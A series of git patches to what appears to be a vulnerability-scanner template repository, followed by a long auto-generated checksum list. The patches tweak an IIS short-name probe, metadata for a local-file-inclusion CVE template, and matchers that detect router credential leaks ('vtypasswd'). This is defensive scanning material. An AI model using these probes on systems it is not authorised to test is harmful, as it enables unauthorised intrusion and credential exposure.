HTTP/1.1 + OPTIONS /*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 @@ -44,4 +44,4 @@ http: - type: dsl dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" -# digest: 4a0a0047304502203ead208e8734bc93932ce5161465801e18f3df07bb3e0a9d5b4ffd6f5dc8fa36022100b6781d0b7f1c1e6e5215899614f159a1546c8839d4a8005211f7684550070bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ead208e8734bc93932ce5161465801e18f3df07bb3e0a9d5b4ffd6f5dc8fa36022100b6781d0b7f1c1e6e5215899614f159a1546c8839d4a8005211f7684550070bfd:922c64590222798bb761d5b6d8e72950 From bde3fa47229be0563c1fe3e1c9d34978a13f698e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 17 Jul 2024 11:09:21 +0530 Subject: [PATCH 1318/1841] minor update --- network/cves/2024/CVE-2024-6746.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml index aa5e7eb642..abb0c3b999 100644 --- a/network/cves/2024/CVE-2024-6746.yaml +++ b/network/cves/2024/CVE-2024-6746.yaml @@ -21,8 +21,8 @@ info: epss-score: 0.00045 epss-percentile: 0.1594 metadata: - vendor: NaiboWang - product: EasySpider + vendor: naibowang + product: easyspider tags: cve,cve2024,lfi,network flow: http(1) && http(2) From c47c557f705667df3b90c3732612e8a2625dc88b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 17 Jul 2024 12:37:31 +0530 Subject: [PATCH 1319/1841] minor-update --- http/cves/2024/CVE-2024-32238.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-32238.yaml b/http/cves/2024/CVE-2024-32238.yaml index 34200bda34..943b183d3e 100644 --- a/http/cves/2024/CVE-2024-32238.yaml +++ b/http/cves/2024/CVE-2024-32238.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 fofa-query: app="H3C-Ent-Router" && title=="ER8300G2-X系统管理" - tags: cve,cve2024,instrusive,leak,h3c + tags: cve,cve2024,leak,h3c http: - raw: @@ -36,20 +36,15 @@ http: - type: word part: body words: - - 'ER8300G2-X' - - 'if-type' - - 'ifname' - 'vtyname' - 'vtypasswd' - 'auxauthmode' - - 'icenable' - - 'logdisklevel' condition: and - type: word - part: header + part: content_type words: - - 'application/x-unknown;charset=GB2312' + - 'application/x-unknown' - type: status status: From 1e816618668de5c0506794c40ba1d366e61cdd0c Mon Sep 17 00:00:00 2001 From: Vikas Gupta Date: Wed, 17 Jul 2024 16:03:03 +0530 Subject: [PATCH 1320/1841] Update airflow-detect.yaml For newer versions --- http/technologies/apache/airflow-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index eb64400cc0..b85792d59b 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -20,7 +20,7 @@ http: - type: word part: body words: - - "Airflow 404 = lots of circles" + - "Airflow 404" - type: status status: From c3f76d43d6ee9ad4bd374b42111f9b8e65f78356 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Wed, 17 Jul 2024 18:40:00 +0800 Subject: [PATCH 1321/1841] Create nacos-workflow.yaml --- workflows/nacos-workflow.yaml | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 workflows/nacos-workflow.yaml diff --git a/workflows/nacos-workflow.yaml b/workflows/nacos-workflow.yaml new file mode 100644 index 0000000000..6a7ba31971 --- /dev/null +++ b/workflows/nacos-workflow.yaml @@ -0,0 +1,10 @@ +id: nacos-workflow + +info: + name: Nacos Security Checks + author: Co5mos + description: A simple workflow that runs all Nacos related nuclei templates on a given target. +workflows: + - template: http/technologies/nacos-version.yaml + subtemplates: + - tags: nacos From 78870d698bcc1caddf6c0505751249872b8738e4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 17 Jul 2024 10:56:09 +0000 Subject: [PATCH 1322/1841] Auto Generated New Template Addition List [Wed Jul 17 10:56:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 660a17e54c..599faf2887 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml +http/exposures/files/adcs-certificate.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From 007eeae9090a8ef30c9d1b1f23f3ec57f704542d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 10:56:24 +0000 Subject: [PATCH 1323/1841] Auto Generated Templates Checksum [Wed Jul 17 10:56:24 UTC 2024] :robot: --- templates-checksum.txt | 433 +++++++++++++++++++++-------------------- 1 file changed, 217 insertions(+), 216 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d1ccdd58d0..dbcc5cf3ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -734,7 +734,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f221e helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 +helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 helpers/wordpress/plugins/advanced-custom-fields.txt:a7fbd6d327737c06c4df75324d67f7a31797d931 helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 @@ -744,7 +744,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:3d21640165adc9cb26c17e43dc6358a33c744d03 +helpers/wordpress/plugins/astra-sites.txt:c2dd4309068e440533d1b8b76fb6680a1324df74 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 helpers/wordpress/plugins/backwpup.txt:93cd63d42092dfdf799d4cecf593fe4d574f77dd @@ -774,7 +774,7 @@ helpers/wordpress/plugins/copy-delete-posts.txt:a2048abb201b6201e7cd25e8b0262758 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 -helpers/wordpress/plugins/custom-fonts.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc +helpers/wordpress/plugins/custom-fonts.txt:bcfa1e591aab992fff773d6a0dc4bb58433d278a helpers/wordpress/plugins/custom-post-type-ui.txt:4bfe61fd9e7ec461ff91963632ff470bd1264c1a helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 @@ -790,7 +790,7 @@ helpers/wordpress/plugins/elementor.txt:d9abe4c43d66f95b79773f980a97bfd3f2148920 helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:ccf30be4f6440a2ed97fd66ad803378be157d525 +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe helpers/wordpress/plugins/ewww-image-optimizer.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c @@ -834,12 +834,12 @@ helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff -helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 +helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:0ef6ca3504757e440dbb7f74dfc7956540130d09 -helpers/wordpress/plugins/mailpoet.txt:8ee7471e0c39a54428f13c32349d570cc514d8d2 +helpers/wordpress/plugins/mailpoet.txt:970defc3a5b51878c279d9b687b808ec0765df77 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:ba9db54a3e9b0df9d1362a546f3b3e62f1aa032c @@ -881,7 +881,7 @@ helpers/wordpress/plugins/seo-by-rank-math.txt:85bea03724452599fd9bc595e166c423d helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90dedf6 helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 -helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 +helpers/wordpress/plugins/shortpixel-image-optimiser.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd @@ -895,21 +895,21 @@ helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166b helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 -helpers/wordpress/plugins/tablepress.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/the-events-calendar.txt:f7d7dab88570c6cb518c4022c6b0be1c5b833457 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:a2386393a973e72dbd27804a8dc3f6ef5962f536 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:480da60c093184bf0f5f182f5e48a8389a98ab75 helpers/wordpress/plugins/under-construction-page.txt:93c73a1987305f0a1f548b0025a3cb9e15bf420f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 +helpers/wordpress/plugins/w3-total-cache.txt:ce69193a5f086b7c0e6f20efbf6aee50c63e8244 helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e891e96cf01bca92 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -921,15 +921,15 @@ helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:60d712d9a12f5416daabb3565821281c3cba1d4c helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 -helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce +helpers/wordpress/plugins/woocommerce-services.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-crontrol.txt:eb8b2b4c9662703da43bc73b59b0508ccdd9de8e +helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 @@ -945,7 +945,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 +helpers/wordpress/plugins/wp-statistics.txt:982b37978de445a43803deafb09df7076adbabc4 helpers/wordpress/plugins/wp-super-cache.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -3479,7 +3479,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:772f40c37a1b1da253f91f61412f6d74b85d2a70 +http/cves/2024/CVE-2024-36401.yaml:2439f9a75658efa3cb4cc61de851bce44ed55dec http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -5002,6 +5002,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671 http/exposures/configs/zend-config-file.yaml:f835fc3f4e814315144214f5bb0fe1a8cd178a71 +http/exposures/files/adcs-certificate.yaml:4eaec669c8a4fa91714bcf254c682581a83408df http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:2a3d72cad226944f1ecf05789504cc811b77e5bc http/exposures/files/apdisk-disclosure.yaml:2c1e02f1fe0bf0c57cc1baf6d1fa6712b32a1856 @@ -7293,229 +7294,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:78e473b2002903a0192fd998b91f26e855b03d5e -http/technologies/wordpress/plugins/add-to-any.yaml:9829716605e935b6985f72c38c410dded0e990bc -http/technologies/wordpress/plugins/admin-menu-editor.yaml:33096ed0f498d97bdcad8672086d15d1fdf5aeff +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:771b39420e143f066b590d47b05bdd6dcbe9c8a9 -http/technologies/wordpress/plugins/akismet.yaml:3134245df155fa9481f374871f595185bd758264 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0378656a08955e3633abb435d4e4f9cfc2237ae0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:02be73602f59e4f4fa8dbed7bebbb05d32b0e094 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:458de0829203e3d0e9e4e39fbab567ae495937b2 -http/technologies/wordpress/plugins/amp.yaml:886625969dd2214d6e6a417c1f5e13a739140509 -http/technologies/wordpress/plugins/antispam-bee.yaml:e29d66f89996e3df7ffdf3d4811a7ea7dcd2aeb3 -http/technologies/wordpress/plugins/astra-sites.yaml:7a0612a7053fd0a6366d2c8159c76b9dc3530963 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:54e76f9353ed04e61edc88260c07d795799cb753 -http/technologies/wordpress/plugins/backwpup.yaml:0368fdc564f22bd200a1b3eaa429da460de885c3 -http/technologies/wordpress/plugins/better-search-replace.yaml:d4d8f3048d5dd89667e74b691025044ee1a92445 -http/technologies/wordpress/plugins/better-wp-security.yaml:e2359d1e8adca00efb5f7cec7030e3ef29f71939 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:a2ce81ec51c39edc8c6c4c98b36bed27cb660140 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ee8c422d49eaba49cc3663b01112954828814582 -http/technologies/wordpress/plugins/breeze.yaml:d9df29e7c06d2f76fe4f3dadf2267d1dafe795cb -http/technologies/wordpress/plugins/broken-link-checker.yaml:fe20e82f147bef77dde5e0d9da362b22729c54c2 -http/technologies/wordpress/plugins/chaty.yaml:56e75be266a3df97a9bd96a1be5969ce6f1c601a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:eb93896a42336e406fdbc4c0c224ba2137a045fd -http/technologies/wordpress/plugins/classic-editor.yaml:7472544b59952d9e488b9479373f674dcd504698 -http/technologies/wordpress/plugins/classic-widgets.yaml:e09b4c360d3b798440e0705d9e44e87baae238dd -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:51350dbb567dd46b75e9a7a5b3168bcf99c079e0 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:760de8aae1d370996b6b7ab5f02961b673a8f4ba -http/technologies/wordpress/plugins/coblocks.yaml:09d89263f646e5e0b87f990ba38f043edc8ef1d4 -http/technologies/wordpress/plugins/code-snippets.yaml:4ec6bac5b93b6bc48ca4c658a4e44a48db45437f -http/technologies/wordpress/plugins/coming-soon.yaml:127d526f41beb277267848f9766495d93037bc8a -http/technologies/wordpress/plugins/complianz-gdpr.yaml:fe3df481e507e06ae7bd75e8274329ac122ebd4e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:fc3284a54f46f1904d7e367f72a841f44a60184c -http/technologies/wordpress/plugins/contact-form-7.yaml:a7a98529a22cc2ffefc8f39e57704d4d7b24c743 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:787cdade7bfca275c8044c0d22f159c69d38cf94 -http/technologies/wordpress/plugins/cookie-law-info.yaml:3f3654b83db3e10f32e58186fc4706c92a61333b -http/technologies/wordpress/plugins/cookie-notice.yaml:282b48cf73ea493e94480cfe762001430e670dd8 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:739b0da6d12e7a54beae64fec15ba5489f92a76c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:024e57dc3d6252e31da74d796d4adb64e52f46b4 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:cb9cfb3a524411d3cf587af448d4d67524dc806b -http/technologies/wordpress/plugins/custom-css-js.yaml:2ea96134e7ecd686347fe547cc4e3ae9180f29f6 -http/technologies/wordpress/plugins/custom-fonts.yaml:b070221f62ce6b293246d67bda7a487c35cddd34 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:bcb9e6d2d00f130fdc992116d9eb74d63af01983 -http/technologies/wordpress/plugins/disable-comments.yaml:6b1efa4654dca1c4d3f7143e20d1af0f6338371e -http/technologies/wordpress/plugins/disable-gutenberg.yaml:00a576e9ee4fbfad19d9b6f76051b666285082b2 -http/technologies/wordpress/plugins/duplicate-page.yaml:ecc0a5b0227ca11ea92356eedfaaaeee9a8ccfdd -http/technologies/wordpress/plugins/duplicate-post.yaml:661a248fe506f8c5a90f516efddb472462aaa555 -http/technologies/wordpress/plugins/duplicator.yaml:1a51e74174628dc8fecefcc4a1357a22f31c864f -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:22a0ccc964f1077aabb44ed11e6c2216f5f18c23 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a 